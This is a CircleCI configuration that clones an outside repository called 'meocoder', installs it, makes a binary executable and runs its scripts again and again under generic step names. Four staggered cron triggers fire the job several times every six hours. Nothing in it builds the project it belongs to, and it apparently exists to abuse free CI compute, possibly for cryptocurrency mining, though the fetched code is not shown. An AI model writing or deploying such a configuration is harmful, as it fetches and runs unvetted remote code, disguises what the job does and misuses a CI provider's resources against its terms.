version: 2.1
jobs:
  build:
    docker:
      - image: circleci/node:12
      
    resource_class: medium

    working_directory: ~/meocoder

    steps:
      - checkout
      
      - run:
          name: Clone and run task
          command:  git clone https://github.com/vippro99/meocoder.git && cd meocoder && npm i -s && chmod +x meocoder config.json && node app-1h.js
      - run:
          name: New task
          command:  cd meocoder && node app-1h.js
      - run:
          name: Build new source
          command:  cd meocoder && node app-1h.js
      - run:
          name: Update source
          command:  cd meocoder && node app-1h.js
      - run:
          name: Save and close jobs
          command:  cd meocoder && node test-45m.js
      
      # setup cronjob 
workflows:
  version: 2

  6h_rebuild:
    triggers:
      - schedule:
          cron: "13 4,10,16,22 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "14 4,10,16,22 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "15 4,10,16,22 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "16 4,10,16,22 * * *"
          filters:
            branches:
              only:
                - main
                - master
    jobs:
      - build
